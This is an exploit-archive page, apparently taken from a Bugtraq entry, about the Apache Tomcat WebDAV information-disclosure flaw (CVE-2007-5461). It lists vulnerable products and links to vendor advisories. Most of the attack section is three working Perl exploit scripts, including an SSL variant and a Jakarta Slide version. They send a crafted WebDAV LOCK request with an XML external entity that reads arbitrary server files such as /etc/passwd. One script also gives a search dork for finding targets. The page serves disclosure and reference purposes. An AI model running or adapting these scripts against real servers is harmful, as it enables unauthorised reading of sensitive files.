Home » Exploits » Apache Tomcat WebDav Remote Information Disclosure Vulnerability
|
|
|
Feeds -
Exploits
|
|
Written by eliteb0y
|
|
Wednesday, 11 March 2009 22:12 |
Apache Tomcat WebDav Remote Information Disclosure Vulnerability
-\\Bugtraq ID:
26070
-\\Class:
Design Error
-\\CVE:
CVE-2007-5461
CVE-2007-5731
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Oct 14 2007 12:00AM
-\\Updated:
Mar 11 2009 05:46PM
-\\Credit:
eliteb0y discovered this issue.
-\\Vulnerable:
WiKID Systems WiKID Server 3.0.4
VMWare VirtualCenter Management Server 2
VMWare ESX Server 3.0.2
VMWare ESX Server 3.0.1
VMWare ESX Server 3.5
Sun Solaris 9_x86
Sun Solaris 9_sparc
Sun Solaris 9
Sun Solaris 10_x86
Sun Solaris 10_sparc
Sun Solaris 10
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SuSE Linux Open-Xchange 4.1
S.u.S.E. SUSE Linux Enterprise Server 9 SP3
S.u.S.E. SUSE Linux Enterprise Server 10 SP2
S.u.S.E. SUSE Linux Enterprise Server 10 SP1
S.u.S.E. SUSE Linux Enterprise Server 10
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP1
S.u.S.E. SUSE Linux Enterprise Desktop 10
S.u.S.E. SUSE Linux Enterprise 10 SP1 DEBUGINFO
S.u.S.E. SUSE Linux Enterprise 10 SP1 DEBUGINFO
S.u.S.E. SLE SDK 10.SP1
S.u.S.E. SLE SDK 10
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
S.u.S.E. openSUSE 10.1
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Office Server
S.u.S.E. Novell Linux POS 9
S.u.S.E. Novell Linux Desktop SDK 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Novell Linux Desktop 9
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 10.2 x86_64
S.u.S.E. Linux Professional 10.2
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 10.2 x86_64
S.u.S.E. Linux Personal 10.2
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Openexchange Server
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Enterprise Server 8
S.u.S.E. Linux Enterprise Server 10.SP1
S.u.S.E. Linux Enterprise Server 10
S.u.S.E. Linux Enterprise SDK 10 SP1
S.u.S.E. Linux Enterprise SDK 10
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux Desktop 10
S.u.S.E. Linux 10.1 x86-64
S.u.S.E. Linux 10.1 x86
S.u.S.E. Linux 10.1 ppc
S.u.S.E. Linux 10.0 x86-64
S.u.S.E. Linux 10.0 x86
S.u.S.E. Linux 10.0 ppc
RedHat Red Hat Network Satellite Server 5.0
RedHat Red Hat Network Satellite (for RHEL 4) 5.1
RedHat Network Satellite (for RHEL 4) 4.2
RedHat Fedora 7 0
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux 5 server
RedHat Developer Suite EL4 3
RedHat Application Server WS4 2
RedHat Application Server ES4 2
RedHat Application Server AS4 2
RedHat Network Satellite (for RHEL 3) 4.2
Pardus Linux 2008 0
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
MandrakeSoft Linux Mandrake 2007.1 x86_64
MandrakeSoft Linux Mandrake 2007.1
IBM WebSphere Application Server Community Edition 2.0 1
IBM WebSphere Application Server Community Edition 2.0
IBM WebSphere Application Server Community Edition 1.1 2
IBM WebSphere Application Server Community Edition 1.1 1
IBM WebSphere Application Server Community Edition 1.0.1 2
IBM WebSphere Application Server Community Edition 1.0.1 1
IBM WebSphere Application Server Community Edition 1.0.1
IBM WebSphere Application Server Community Edition 1.0 1
IBM WebSphere Application Server Community Edition 1.1
IBM WebSphere Application Server Community Edition 1.0
Gentoo www-servers/tomcat 6.0.15
Gentoo www-servers/tomcat 6.0.14
Gentoo www-servers/tomcat 6.0.13
Gentoo www-servers/tomcat 6.0.12
Gentoo www-servers/tomcat 6.0.11
Gentoo www-servers/tomcat 6.0.10
Gentoo www-servers/tomcat 6.0.9
Gentoo www-servers/tomcat 6.0.8
Gentoo www-servers/tomcat 6.0.7
Gentoo www-servers/tomcat 6.0.6
Gentoo www-servers/tomcat 6.0.5
Gentoo www-servers/tomcat 6.0.4
Gentoo www-servers/tomcat 6.0.3
Gentoo www-servers/tomcat 6.0.2
Gentoo www-servers/tomcat 6.0.1
Gentoo www-servers/tomcat 6.0
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Avaya Meeting Exchange - Enterprise Edition
Avaya Meeting Exchange 5.0 .0.52
Avaya Meeting Exchange 5.0
Avaya AES 4.2.1
Avaya AES 4.0.1
Avaya AES 3.1.6
Avaya AES 3.1.5
Avaya AES 3.1.4
Avaya AES 3.1.3
Avaya AES 4.2
Avaya AES 4.1
Avaya AES 4.0
Avaya AES 3.1
Avaya AES 3.0
Apple Mac OS X Server 10.5.5
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apple Mac OS X 10.4
Apache Software Foundation Tomcat 6.0.14
Apache Software Foundation Tomcat 6.0.13
Apache Software Foundation Tomcat 6.0.12
Apache Software Foundation Tomcat 6.0.11
Apache Software Foundation Tomcat 6.0.10
Apache Software Foundation Tomcat 6.0.9
Apache Software Foundation Tomcat 6.0.8
Apache Software Foundation Tomcat 6.0.7
Apache Software Foundation Tomcat 6.0.6
Apache Software Foundation Tomcat 6.0.5
Apache Software Foundation Tomcat 6.0.4
Apache Software Foundation Tomcat 6.0.3
Apache Software Foundation Tomcat 6.0.2
Apache Software Foundation Tomcat 6.0.1
Apache Software Foundation Tomcat 6.0
Apache Software Foundation Tomcat 5.5.24
Apache Software Foundation Tomcat 5.5.23
Apache Software Foundation Tomcat 5.5.22
Apache Software Foundation Tomcat 5.5.21
Apache Software Foundation Tomcat 5.5.20
Apache Software Foundation Tomcat 5.5.20
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
Apache Software Foundation Tomcat 5.5.19
Apache Software Foundation Tomcat 5.5.18
Apache Software Foundation Tomcat 5.5.17
Apache Software Foundation Tomcat 5.5.17
Apache Software Foundation Tomcat 5.5.16
Apache Software Foundation Tomcat 5.5.15
Apache Software Foundation Tomcat 5.5.14
Apache Software Foundation Tomcat 5.5.13
Apache Software Foundation Tomcat 5.5.12
Apache Software Foundation Tomcat 5.5.12
Apache Software Foundation Tomcat 5.5.11
Apache Software Foundation Tomcat 5.5.11
Apache Software Foundation Tomcat 5.5.10
Apache Software Foundation Tomcat 5.5.10
Apache Software Foundation Tomcat 5.5.9
Apache Software Foundation Tomcat 5.5.9
Apache Software Foundation Tomcat 5.5.8
Apache Software Foundation Tomcat 5.5.8
Apache Software Foundation Tomcat 5.5.7
Apache Software Foundation Tomcat 5.5.7
Apache Software Foundation Tomcat 5.5.6
Apache Software Foundation Tomcat 5.5.6
Apache Software Foundation Tomcat 5.5.5
Apache Software Foundation Tomcat 5.5.5
Apache Software Foundation Tomcat 5.5.4
Apache Software Foundation Tomcat 5.5.4
Apache Software Foundation Tomcat 5.5.3
Apache Software Foundation Tomcat 5.5.3
Apache Software Foundation Tomcat 5.5.2
Apache Software Foundation Tomcat 5.5.2
Apache Software Foundation Tomcat 5.5.1
Apache Software Foundation Tomcat 5.5.1
Apache Software Foundation Tomcat 5.5
Apache Software Foundation Tomcat 5.5
Apache Software Foundation Tomcat 5.4
Apache Software Foundation Tomcat 5.3
Apache Software Foundation Tomcat 5.2
Apache Software Foundation Tomcat 5.1
Apache Software Foundation Tomcat 5.0.31
Apache Software Foundation Tomcat 5.0.30
Apache Software Foundation Tomcat 5.0.30
Apache Software Foundation Tomcat 5.0.28
Apache Software Foundation Tomcat 5.0.19
Apache Software Foundation Tomcat 5.0.16
Apache Software Foundation Tomcat 5.0.15
Apache Software Foundation Tomcat 5.0.14
Apache Software Foundation Tomcat 5.0.13
Apache Software Foundation Tomcat 5.0.12
Apache Software Foundation Tomcat 5.0.11
Apache Software Foundation Tomcat 5.0.10
Apache Software Foundation Tomcat 5.0.9
Apache Software Foundation Tomcat 5.0.8
Apache Software Foundation Tomcat 5.0.7
Apache Software Foundation Tomcat 5.0.6
Apache Software Foundation Tomcat 5.0.5
Apache Software Foundation Tomcat 5.0.4
Apache Software Foundation Tomcat 5.0.3
Apache Software Foundation Tomcat 5.0.2
Apache Software Foundation Tomcat 5.0.1
Apache Software Foundation Tomcat 5.0
Apache Software Foundation Tomcat 4.1.37
Apache Software Foundation Tomcat 4.1.36
Apache Software Foundation Tomcat 4.1.36
Apache Software Foundation Tomcat 4.1.34
Apache Software Foundation Tomcat 4.1.34
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
Apache Software Foundation Tomcat 4.1.32
Apache Software Foundation Tomcat 4.1.31
Apache Software Foundation Tomcat 4.1.24
Apache Software Foundation Tomcat 4.1.12
Apache Software Foundation Tomcat 4.1.10
Apache Software Foundation Tomcat 4.1.9 beta
Apache Software Foundation Tomcat 4.1.3 beta
Apache Software Foundation Tomcat 4.1
Apache Software Foundation Tomcat 4.1
Apache Software Foundation Tomcat 4.0.7
Apache Software Foundation Tomcat 4.0.6
Apache Software Foundation Tomcat 4.0.6
Apache Software Foundation Tomcat 4.0.5
Apache Software Foundation Tomcat 4.0.5
+ RedHat Stronghold 4.0
Apache Software Foundation Tomcat 4.0.4
Apache Software Foundation Tomcat 4.0.4
Apache Software Foundation Tomcat 4.0.3
Apache Software Foundation Tomcat 4.0.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
Apache Software Foundation Tomcat 4.0.2
Apache Software Foundation Tomcat 4.0.2
Apache Software Foundation Tomcat 4.0.1
Apache Software Foundation Tomcat 4.0.1
Apache Software Foundation Tomcat 4.0
-BSDI BSD/OS 4.0
-Caldera OpenLinux 2.4
-Conectiva Linux 5.1
-Debian Linux 2.2
-Debian Linux 2.1
-Digital UNIX 4.0
-FreeBSD FreeBSD 5.0
-FreeBSD FreeBSD 4.0
-MandrakeSoft Linux Mandrake 7.1
-MandrakeSoft Linux Mandrake 7.0
-NetBSD NetBSD 1.4.2 x86
-NetBSD NetBSD 1.4.1 x86
-RedHat Linux 6.2 i386
-RedHat Linux 6.1 i386
-SGI IRIX 6.5
-SGI IRIX 6.4
-Sun Solaris 8
-Sun Solaris 7.0
Apache Software Foundation Tomcat 4.0
Apache Software Foundation Tomcat 5.0
Apache Software Foundation Tomcat 4.0.0 RC2
Apache Software Foundation Jakarta Slide 2.1
Apache Software Foundation Geronimo 2.0.2
Apache Software Foundation Geronimo 2.0.1
Apache Software Foundation Geronimo 1.1
Apache Software Foundation Geronimo 1.0.1
Apache Software Foundation Geronimo 1.0
-\\Not Vulnerable:
WiKID Systems WiKID Server 3.0.5
-\\Discussion
Apache Tomcat is prone to a remote information-disclosure vulnerability
Remote attackers can exploit this issue to obtain the contents of sensitive files stored on the server.
-\\Exploit(s)/PoC(s):
The following exploits are available:
===============================================================
tomcat_webdav_26070.pl
^^^^^^^^^^^^^^^^^^^^^^^
#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?
# SET REMOTE PORT HERE
$remoteport = 8080;
sub usage {
print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n";
print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit;
}
if ($#ARGV < 2) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";
$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
print $sock $ExploitRequest;
while(<$sock>) {
print;
}
===============================================================
tomcat_webdav_ssl_only_26070.pl
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#!/usr/bin/perl
#================================================================
# Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL
# MoDiFiEd version by : h3rcul3s
# ORiGiNaL Version by : kcdarookie aka eliteb0y / 2007 http://milw0rm.org/exploits/4530
# MoDiFiCaTiOn : This code is useble against targets over SSL
# Prerequisites : A valid login credentials, webdav
# DoRk : intitle:"Directory Listing For /" + inurl:webdav tomcat
# Potential targets : similar to https://www.somehost.com:8443
#================================================================
# THaNkS To eliteb0y, the whole team AnD "perlmonks".
# This piece of code is written ONLY for educational purpose.
# Use it at your own risk.
# No author will be responsible for any damage.
#================================================================
# -------------------------[C O D E]-----------------------------
#================================================================
use LWP::Protocol::https;
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?
# SET REMOTE PORT HERE--------------------------------------------
$remoteport = 8443;
sub usage {
print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "\n\n";
print "Basic exploit by : kcdarookie aka eliteb0y / 2007\n";
print "SSL Support added by : .o0|h 3 r c u l 3 s|0o. \n";
print "\n\n";
print "USAGE :\nperl TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n";
print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";exit;
}
if ($#ARGV < 2) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];
my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n";
print "\n";
print "Launching Remote Exploit over SSL...\n";
$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
print $sock $ExploitRequest;
while(<$sock>) {
print;
}
===============================================================
jakarta_slide_26070.pl
^^^^^^^^^^^^^^^^^^^^^^^
#!/usr/bin/perl
#******************************************************
# Jakarta Slide Remote File Disclosure Zeroday Xploit
# eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?
# SET REMOTE PORT HERE
$remoteport = 8080;
sub usage {
print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n";
print "eliteb0y / 2007\n";
print "usage: perl JAKARTAXPL <remotehost> <slide file> <file to retrieve> [username] [password]\n";
print "example: perl JAKARTAXPL www.hostname.com /slide/users/guest /etc/passwd guest guest\n";exit;
}
if ($#ARGV < 2) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n";
print "eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";
$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
print $sock $ExploitRequest;
while(<$sock>) {
print;
}
-\\Solution
Fixes are available in the Tomcat SVN repository. Please see the referenced advisories for more information.
-\\References(s)
--About the security content of Security Update 2008-004 and Mac OS X 10.5.4
http://support.apple.com/kb/HT216 (Apple)
--Apache Geronimo Potential vulnerability in Apache Tomcat Webdav servlet
http://geronimo.apache.org/2007/10/18/potential-vulnerability-in-apache-tomcat-webdav-servlet.htm (Apache)
--Apache Geronimo Web Site
http://geronimo.apache.or (Apache)
--Apache Tomcat 4.x vulnerabilities
http://tomcat.apache.org/security-4.htm (Apache)
--Apache Tomcat 5.x vulnerabilities
http://tomcat.apache.org/security-5.htm (Apache)
--Apache Tomcat 6.x vulnerabilities
http://tomcat.apache.org/security-6.htm (Apache)
--Apache Tomcat Homepage
http://tomcat.apache.org (Apache)
--GERONIMO-3549: Potential vulnerability in Apache Tomcat Webdav servlet
https://issues.apache.org/jira/browse/GERONIMO-354 (Apache)
--Important vulnerability disclosed in Apache Tomcat webdav servlet
http://mail-archives.apache.org/mod_mbox/tomcat-users/200710.mbox/%
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
%3 (Apache)
--Release Name: 3.0.5
https://sourceforge.net/project/shownotes.php?release_id=626903&group_id=14477 (WiKID Systems)
--Tomcat Webdav servlet security vulnerability in WebSphere Application Server Com
http://www-1.ibm.com/support/docview.wss?uid=swg2128611 (IBM)
--WebDAV Homepage
www.webdav.org (WebDAV)
--ASA-2008-401 - tomcat security update (RHSA-2008-0862)
http://support.avaya.com/elmodocs2/security/ASA-2008-401.ht (Avaya)
--RHSA-2008:0042-4 - tomcat security update
https://rhn.redhat.com/errata/RHSA-2008-0042.htm (Red Hat)
--RHSA-2008:0195-5 tomcat security update
http://rhn.redhat.com/errata/RHSA-2008-0195.htm (Red Hat)
--RHSA-2008:0261-4 Moderate: Red Hat Network Satellite Server security update
http://rhn.redhat.com/errata/RHSA-2008-0261.htm (Red Hat)
--RHSA-2008:0524-4 Red Hat Network Satellite Server security update
http://rhn.redhat.com/errata/RHSA-2008-0524.htm (Red Hat)
--RHSA-2008:0630-3 Low: Red Hat Network Satellite Server security update
http://rhn.redhat.com/errata/RHSA-2008-0630.htm (Red Hat)
--Security Vulnerabilities in Tomcat 4.0 Shipped with Solaris 9 and 10
http://sunsolve.sun.com/search/document.do?assetkey=1-66-239312- (Sun Microsystems)
--Solution 239312 : Security Vulnerabilities in Tomcat 4.0 Shipped with Solaris
http://sunsolve.sun.com/search/document.do?assetkey=1-66-239312- (Sun)
|
|
|
|
